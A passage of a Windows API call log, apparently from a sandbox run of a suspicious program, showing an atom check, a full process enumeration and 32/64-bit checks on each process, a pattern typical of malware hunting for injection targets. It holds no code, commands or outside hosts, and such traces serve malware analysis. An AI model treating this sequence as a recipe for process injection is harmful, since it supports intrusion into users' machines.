	[0122.761] GetLastError () returned 0x5
	[0122.761] GetLastError () returned 0x5
	[0122.761] GetLastError () returned 0x5
	[0122.761] GetLastError () returned 0x5
	[0122.761] GetLastError () returned 0x5
	[0122.761] GetLastError () returned 0x5
	[0122.761] GetLastError () returned 0x5
	[0122.761] GetLastError () returned 0x5
	[0122.761] GetLastError () returned 0x5
	[0122.761] GetLastError () returned 0x5
	[0122.761] GetLastError () returned 0x5
	[0122.761] GetLastError () returned 0x5
	[0122.761] GetLastError () returned 0x5
	[0122.761] GetLastError () returned 0x5
	[0122.761] GetLastError () returned 0x5
	[0122.761] GetLastError () returned 0x5
	[0122.761] GetLastError () returned 0x5
	[0122.761] GetLastError () returned 0x5
	[0122.762] GetLastError () returned 0x5
	[0122.762] GetLastError () returned 0x5
	[0122.762] GetLastError () returned 0x5
	[0122.762] GetLastError () returned 0x5
	[0122.762] GetLastError () returned 0x5
	[0122.762] GetLastError () returned 0x5
	[0122.762] GetLastError () returned 0x5
	[0122.762] GetLastError () returned 0x5
	[0122.762] GetLastError () returned 0x5
	[0122.762] GetLastError () returned 0x5
	[0122.762] GetLastError () returned 0x5
	[0122.762] GetLastError () returned 0x5
	[0122.762] GetLastError () returned 0x5
	[0122.762] GetLastError () returned 0x5
	[0122.762] GetLastError () returned 0x5
	[0122.762] GetLastError () returned 0x5
	[0122.762] GetLastError () returned 0x5
	[0122.762] GetLastError () returned 0x5
	[0122.762] GetLastError () returned 0x5
	[0122.762] GetLastError () returned 0x5
	[0122.762] GetLastError () returned 0x5
	[0122.762] GetLastError () returned 0x5
	[0122.762] GetLastError () returned 0x5
	[0122.762] GetLastError () returned 0x5
	[0122.762] GetLastError () returned 0x5
	[0122.762] GetLastError () returned 0x5
	[0122.762] GetLastError () returned 0x5
	[0122.762] GetLastError () returned 0x5
	[0122.762] GetLastError () returned 0x5
	[0122.762] GetLastError () returned 0x5
	[0122.762] GetLastError () returned 0x5
	[0122.762] GetLastError () returned 0x5
	[0122.762] GetLastError () returned 0x5
	[0122.762] GetLastError () returned 0x5
	[0122.762] GetLastError () returned 0x5
	[0122.762] GetLastError () returned 0x5
	[0122.762] GetLastError () returned 0x5
	[0122.762] GetLastError () returned 0x5
	[0122.762] GetLastError () returned 0x5
	[0122.762] GetLastError () returned 0x5
	[0122.762] GetLastError () returned 0x5
	[0122.762] GetLastError () returned 0x5
	[0122.762] GetLastError () returned 0x5
	[0122.762] GetLastError () returned 0x5
	[0122.762] GetLastError () returned 0x5
	[0122.762] GetLastError () returned 0x5
	[0122.762] GetLastError () returned 0x5
	[0122.762] GetLastError () returned 0x5
	[0122.762] GetLastError () returned 0x5
	[0122.762] GetLastError () returned 0x5
	[0122.762] GetLastError () returned 0x5
	[0122.762] GetLastError () returned 0x5
	[0122.762] GetLastError () returned 0x5
	[0122.762] GetLastError () returned 0x5
	[0122.763] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0122.763] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0122.763] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0122.763] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0122.763] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0122.763] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0122.763] CloseHandle (hObject=0x698) returned 1
	[0122.763] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0122.763] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x39b5b98, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0122.764] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.764] CloseHandle (hObject=0x698) returned 1
	[0122.764] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="cmd.exe", cchWideChar=7, lpMultiByteStr=0x69d5e8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cmd.exe", lpUsedDefaultChar=0x0) returned 7
	[0122.764] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.764] CloseHandle (hObject=0x698) returned 1
	[0122.764] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x39b5b68, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0122.764] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.764] CloseHandle (hObject=0x698) returned 1
	[0122.765] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="conhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5aa8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.765] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.765] CloseHandle (hObject=0x698) returned 1
	[0122.765] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PING.EXE", cchWideChar=8, lpMultiByteStr=0x39b5a30, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PING.EXE", lpUsedDefaultChar=0x0) returned 8
	[0122.799] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x286ff10 | out: SystemInformation=0x0, ResultLength=0x286ff10*=0x16dc8) returned 0xc0000004
	[0122.799] VirtualAlloc (lpAddress=0x0, dwSize=0x16ec8, flAllocationType=0x3000, flProtect=0x4) returned 0x3c20000
	[0122.799] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3c20000, Length=0x16ec8, ResultLength=0x0 | out: SystemInformation=0x3c20000, ResultLength=0x0) returned 0x0
	[0122.801] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0122.801] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x39b5b98, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0122.802] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b5ad8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0122.802] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x39b5a00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.802] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b5a00, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0122.802] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x39b5b98, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0122.802] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x39b5a18, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0122.802] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x39b5a00, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0122.803] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a18, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.803] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5aa8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.803] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x69d568, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0122.803] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.803] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.804] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.804] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a60, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.804] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b68, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.804] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.804] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b98, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.804] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x39b5a30, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.804] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.805] CloseHandle (hObject=0x698) returned 1
	[0122.805] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x39b5b38, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0122.805] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.805] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x399cea8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0122.805] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.805] CloseHandle (hObject=0x698) returned 1
	[0122.805] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x399cea8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0122.806] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.806] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.806] CloseHandle (hObject=0x698) returned 1
	[0122.806] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x39b5a00, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0122.806] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.806] CloseHandle (hObject=0x698) returned 1
	[0122.806] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x39b5a00, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0122.806] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.807] CloseHandle (hObject=0x698) returned 1
	[0122.807] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5b08, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0122.807] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.807] CloseHandle (hObject=0x698) returned 1
	[0122.807] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x399cea8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0122.807] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.807] CloseHandle (hObject=0x698) returned 1
	[0122.807] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x39b5a00, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0122.808] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.808] CloseHandle (hObject=0x698) returned 1
	[0122.808] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.808] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x39b5a60, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.808] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.808] CloseHandle (hObject=0x698) returned 1
	[0122.808] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5a00, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0122.809] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.809] CloseHandle (hObject=0x698) returned 1
	[0122.809] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.809] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.809] CloseHandle (hObject=0x698) returned 1
	[0122.809] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x399cea8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0122.810] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.810] CloseHandle (hObject=0x698) returned 1
	[0122.810] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x399cea8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0122.810] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.810] CloseHandle (hObject=0x698) returned 1
	[0122.810] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x69d6b8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0122.810] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.810] CloseHandle (hObject=0x698) returned 1
	[0122.810] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x399cea8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0122.811] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.811] CloseHandle (hObject=0x698) returned 1
	[0122.811] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x39b96e0, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0122.811] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.811] CloseHandle (hObject=0x698) returned 1
	[0122.811] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x399cea8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0122.811] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.811] CloseHandle (hObject=0x698) returned 1
	[0122.812] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x39b5b20, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0122.812] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.812] CloseHandle (hObject=0x698) returned 1
	[0122.812] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x39b5b68, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.812] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.812] CloseHandle (hObject=0x698) returned 1
	[0122.812] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x399cea8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0122.812] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.812] CloseHandle (hObject=0x698) returned 1
	[0122.813] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x399cea8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0122.813] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.813] CloseHandle (hObject=0x698) returned 1
	[0122.813] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x39b5b50, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0122.813] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.813] CloseHandle (hObject=0x698) returned 1
	[0122.813] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x39b5a60, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0122.814] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.814] CloseHandle (hObject=0x698) returned 1
	[0122.814] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x39b97a8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0122.814] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.814] CloseHandle (hObject=0x698) returned 1
	[0122.814] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x39b5b08, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0122.814] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.814] CloseHandle (hObject=0x698) returned 1
	[0122.814] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x39b5a18, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0122.815] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.815] CloseHandle (hObject=0x698) returned 1
	[0122.815] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x399cea8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0122.815] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.815] CloseHandle (hObject=0x698) returned 1
	[0122.815] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x39b5a00, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0122.816] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.816] CloseHandle (hObject=0x698) returned 1
	[0122.816] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x399cea8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0122.816] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.816] CloseHandle (hObject=0x698) returned 1
	[0122.816] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x39b9af0, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0122.816] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.816] CloseHandle (hObject=0x698) returned 1
	[0122.816] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x39b9af0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0122.817] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.817] CloseHandle (hObject=0x698) returned 1
	[0122.817] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x39b5a00, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0122.817] GetLastError () returned 0x5
	[0122.817] GetLastError () returned 0x5
	[0122.817] GetLastError () returned 0x5
	[0122.817] GetLastError () returned 0x5
	[0122.817] GetLastError () returned 0x5
	[0122.817] GetLastError () returned 0x5
	[0122.817] GetLastError () returned 0x5
